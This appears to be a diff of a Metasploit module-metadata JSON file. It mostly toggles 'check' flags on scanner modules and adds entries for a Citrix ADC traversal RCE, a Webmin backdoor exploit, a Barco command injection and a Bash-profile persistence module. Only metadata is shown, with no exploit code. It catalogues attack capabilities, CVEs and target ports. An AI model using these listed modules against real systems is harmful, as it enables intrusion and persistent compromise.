    "ref_name": "scanner/snmp/arris_dg950",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40559,7 +40743,7 @@
    "path": "/modules/auxiliary/scanner/snmp/brocade_enumhash.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/brocade_enumhash",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40597,7 +40781,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cisco_config_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40635,7 +40819,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cisco_upload_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cisco_upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40673,7 +40857,7 @@
    "path": "/modules/auxiliary/scanner/snmp/cnpilot_r_snmp_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/cnpilot_r_snmp_loot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40712,7 +40896,7 @@
    "path": "/modules/auxiliary/scanner/snmp/epmp1000_snmp_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/epmp1000_snmp_loot",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40749,7 +40933,7 @@
    "path": "/modules/auxiliary/scanner/snmp/netopia_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/netopia_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40788,7 +40972,7 @@
    "path": "/modules/auxiliary/scanner/snmp/sbg6580_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/sbg6580_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40827,7 +41011,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40868,7 +41052,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enum_hp_laserjet",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40905,7 +41089,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumshares",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40942,7 +41126,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -40979,7 +41163,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41018,7 +41202,7 @@
    "path": "/modules/auxiliary/scanner/snmp/snmp_set.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/snmp_set",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41055,7 +41239,7 @@
    "path": "/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/ubee_ddw3611",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41092,7 +41276,7 @@
    "path": "/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/snmp/xerox_workcentre_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41129,7 +41313,7 @@
    "path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/apache_karaf_command_execution",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -41168,7 +41352,7 @@
    "path": "/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/cerberus_sftp_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41206,7 +41390,7 @@
    "path": "/modules/auxiliary/scanner/ssh/detect_kippo.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/detect_kippo",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41246,7 +41430,7 @@
    "path": "/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/eaton_xpert_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41288,7 +41472,7 @@
    "path": "/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/fortinet_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41328,7 +41512,7 @@
    "path": "/modules/auxiliary/scanner/ssh/juniper_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/juniper_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41369,7 +41553,7 @@
    "path": "/modules/auxiliary/scanner/ssh/karaf_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/karaf_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41408,7 +41592,44 @@
    "path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/libssh_auth_bypass",
-    "check": true,
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
+  "auxiliary_scanner/ssh/ssh_enum_git_keys": {
+    "name": "Test SSH Github Access",
+    "fullname": "auxiliary/scanner/ssh/ssh_enum_git_keys",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Wyatt Dahlenburg ( <Wyatt Dahlenburg (@wdahlenb)>"
+    ],
+    "description": "This module will attempt to test remote Git access using\n          (.ssh/id_* private keys). This works against GitHub and\n          GitLab by default, but can easily be extended to support\n          more server types.",
+    "references": [
+      "URL-https://help.github.com/en/articles/testing-your-ssh-connection"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2019-11-27 11:18:01 +0000",
+    "path": "/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/ssh/ssh_enum_git_keys",
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41456,7 +41677,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_enumusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_enumusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41495,7 +41716,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_identify_pubkeys",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41532,7 +41753,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41570,7 +41791,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_login_pubkey",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41607,7 +41828,7 @@
    "path": "/modules/auxiliary/scanner/ssh/ssh_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssh/ssh_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41660,7 +41881,7 @@
    "path": "/modules/auxiliary/scanner/ssl/bleichenbacher_oracle.py",
    "is_install_path": true,
    "ref_name": "scanner/ssl/bleichenbacher_oracle",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41707,7 +41928,7 @@
    "path": "/modules/auxiliary/scanner/ssl/openssl_ccs.rb",
    "is_install_path": true,
    "ref_name": "scanner/ssl/openssl_ccs",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41803,7 +42024,7 @@
    "path": "/modules/auxiliary/scanner/steam/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/steam/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41840,7 +42061,7 @@
    "path": "/modules/auxiliary/scanner/telephony/wardial.rb",
    "is_install_path": true,
    "ref_name": "scanner/telephony/wardial",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41877,7 +42098,7 @@
    "path": "/modules/auxiliary/scanner/telnet/brocade_enable_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/brocade_enable_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -41914,7 +42135,7 @@
    "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/lantronix_telnet_password",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41952,7 +42173,7 @@
    "path": "/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/lantronix_telnet_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -41991,7 +42212,7 @@
    "path": "/modules/auxiliary/scanner/telnet/satel_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/satel_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42032,7 +42253,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_encrypt_overflow",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42069,7 +42290,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42109,7 +42330,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_ruggedcom",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42146,7 +42367,7 @@
    "path": "/modules/auxiliary/scanner/telnet/telnet_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/telnet/telnet_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42180,11 +42401,11 @@

    ],
    "targets": null,
-    "mod_time": "2018-08-27 16:06:07 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/scanner/teradata/teradata_odbc_login.py",
    "is_install_path": true,
    "ref_name": "scanner/teradata/teradata_odbc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42230,7 +42451,7 @@
    "path": "/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/ipswitch_whatsupgold_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42270,7 +42491,7 @@
    "path": "/modules/auxiliary/scanner/tftp/netdecision_tftp.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/netdecision_tftp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42307,7 +42528,7 @@
    "path": "/modules/auxiliary/scanner/tftp/tftpbrute.rb",
    "is_install_path": true,
    "ref_name": "scanner/tftp/tftpbrute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42346,7 +42567,7 @@
    "path": "/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.rb",
    "is_install_path": true,
    "ref_name": "scanner/ubiquiti/ubiquiti_discover",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42384,7 +42605,7 @@
    "path": "/modules/auxiliary/scanner/udp/udp_amplification.rb",
    "is_install_path": true,
    "ref_name": "scanner/udp/udp_amplification",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42422,7 +42643,7 @@
    "path": "/modules/auxiliary/scanner/upnp/ssdp_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/upnp/ssdp_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42463,7 +42684,7 @@
    "path": "/modules/auxiliary/scanner/upnp/ssdp_msearch.rb",
    "is_install_path": true,
    "ref_name": "scanner/upnp/ssdp_msearch",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42504,7 +42725,7 @@
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_file_read.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_file_read",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42545,7 +42766,7 @@
    "path": "/modules/auxiliary/scanner/varnish/varnish_cli_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/varnish/varnish_cli_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42591,7 +42812,7 @@
    "path": "/modules/auxiliary/scanner/vmware/esx_fingerprint.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/esx_fingerprint",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42628,7 +42849,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42666,7 +42887,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmauthd_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmauthd_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -42712,7 +42933,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_permissions",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42758,7 +42979,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_sessions",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42804,7 +43025,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_users.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_users",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42850,7 +43071,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_enum_vms",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42896,7 +43117,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_host_details.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_host_details",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -42942,7 +43163,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -42988,7 +43209,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_screenshot_stealer",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -43038,7 +43259,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_server_dir_trav",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43088,7 +43309,7 @@
    "path": "/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/vmware/vmware_update_manager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43126,7 +43347,7 @@
    "path": "/modules/auxiliary/scanner/vnc/ard_root_pw.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/ard_root_pw",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43174,7 +43395,7 @@
    "path": "/modules/auxiliary/scanner/vnc/vnc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43214,7 +43435,7 @@
    "path": "/modules/auxiliary/scanner/vnc/vnc_none_auth.rb",
    "is_install_path": true,
    "ref_name": "scanner/vnc/vnc_none_auth",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43292,7 +43513,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/urgent11_check.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/urgent11_check",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43333,7 +43554,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/wdbrpc_bootline",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43371,7 +43592,7 @@
    "path": "/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/vxworks/wdbrpc_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43420,7 +43641,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_auth_methods",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43469,7 +43690,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_cmd",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43518,7 +43739,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43567,7 +43788,7 @@
    "path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
    "is_install_path": true,
    "ref_name": "scanner/winrm/winrm_wql",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -43607,7 +43828,7 @@
    "path": "/modules/auxiliary/scanner/wproxy/att_open_proxy.py",
    "is_install_path": true,
    "ref_name": "scanner/wproxy/att_open_proxy",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43652,7 +43873,7 @@
    "path": "/modules/auxiliary/scanner/wsdd/wsdd_query.rb",
    "is_install_path": true,
    "ref_name": "scanner/wsdd/wsdd_query",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -43690,7 +43911,7 @@
    "path": "/modules/auxiliary/scanner/x11/open_x11.rb",
    "is_install_path": true,
    "ref_name": "scanner/x11/open_x11",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -46596,7 +46817,7 @@
    "path": "/modules/auxiliary/voip/asterisk_login.rb",
    "is_install_path": true,
    "ref_name": "voip/asterisk_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -46727,7 +46948,7 @@
    "path": "/modules/auxiliary/voip/sip_deregister.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_deregister",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -46765,7 +46986,7 @@
    "path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
    "is_install_path": true,
    "ref_name": "voip/sip_invite_spoof",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -49665,7 +49886,7 @@
    "targets": [
      "@(#)fingerd.c   5.1 (Berkeley) 6/6/85"
    ],
-    "mod_time": "2018-11-22 23:10:57 +0000",
+    "mod_time": "2019-12-23 19:02:13 +0000",
    "path": "/modules/exploits/bsd/finger/morris_fingerd_bof.rb",
    "is_install_path": true,
    "ref_name": "bsd/finger/morris_fingerd_bof",
@@ -51683,6 +51904,80 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/citrix_dir_traversal_rce": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal RCE",
+    "fullname": "exploit/linux/http/citrix_dir_traversal_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-17",
+    "type": "exploit",
+    "author": [
+      "Project Zero India",
+      "TrustedSec",
+      "James Brytan",
+      "James Smith",
+      "Marisa Mack",
+      "Rob Vinson",
+      "Sergey Pashevkin",
+      "Steven Laura",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n        NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.",
+    "references": [
+      "CVE-2019-19781",
+      "EDB-47901",
+      "EDB-47902",
+      "URL-https://support.citrix.com/article/CTX267027/",
+      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/"
+    ],
+    "platform": "Python,Unix",
+    "arch": "python, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Python",
+      "Unix Command"
+    ],
+    "mod_time": "2020-01-14 10:46:04 +0000",
+    "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/citrix_dir_traversal_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cpi_tararchive_upload": {
    "name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
    "fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -56664,11 +56959,11 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-11-12 02:17:58 +0000",
+    "mod_time": "2019-12-03 10:39:58 +0000",
    "path": "/modules/exploits/linux/http/pulse_secure_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pulse_secure_cmd_exec",
-    "check": false,
+    "check": true,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -58607,6 +58902,70 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/webmin_backdoor": {
+    "name": "Webmin password_change.cgi Backdoor",
+    "fullname": "exploit/linux/http/webmin_backdoor",
+    "aliases": [
+      "exploit/unix/webapp/webmin_backdoor"
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-10",
+    "type": "exploit",
+    "author": [
+      "AkkuS",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
+    "references": [
+      "CVE-2019-15107",
+      "URL-http://www.webmin.com/exploit.html",
+      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
+      "URL-https://blog.firosolutions.com/exploits/webmin/",
+      "URL-https://github.com/webmin/webmin/issues/947"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2020-01-14 00:50:04 +0000",
+    "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/webmin_backdoor",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/webmin_packageup_rce": {
    "name": "Webmin Package Updates Remote Command Execution",
    "fullname": "exploit/linux/http/webmin_packageup_rce",
@@ -58656,6 +59015,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/wepresent_cmd_injection": {
+    "name": "Barco WePresent file_transfer.cgi Command Injection",
+    "fullname": "exploit/linux/http/wepresent_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-30",
+    "type": "exploit",
+    "author": [
+      "Jacob Baines"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection\n        vulnerability found in Barco WePresent and related OEM'ed products.\n        The vulnerability is triggered via an HTTP POST request to the\n        file_transfer.cgi endpoint.",
+    "references": [
+      "CVE-2019-3929",
+      "EDB-46786",
+      "URL-https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-01-14 07:52:30 +0000",
+    "path": "/modules/exploits/linux/http/wepresent_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wepresent_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/wipg1000_cmd_injection": {
    "name": "WePresent WiPG-1000 Command Injection",
    "fullname": "exploit/linux/http/wipg1000_cmd_injection",
@@ -59482,6 +59892,45 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/local/bash_profile_persistence": {
+    "name": "Bash Profile Persistence",
+    "fullname": "exploit/linux/local/bash_profile_persistence",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "1989-06-08",
+    "type": "exploit",
+    "author": [
+      "Michael Long <bluesentinel@protonmail.com>"
+    ],
+    "description": "\"\n          This module writes an execution trigger to the target's Bash profile.\n          The execution trigger executes a call back payload whenever the target\n          user opens a Bash terminal. A handler is not run automatically, so you\n          must configure an appropriate exploit/multi/handler to receive the callback.\n        \"",
+    "references": [
+      "URL-https://attack.mitre.org/techniques/T1156/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
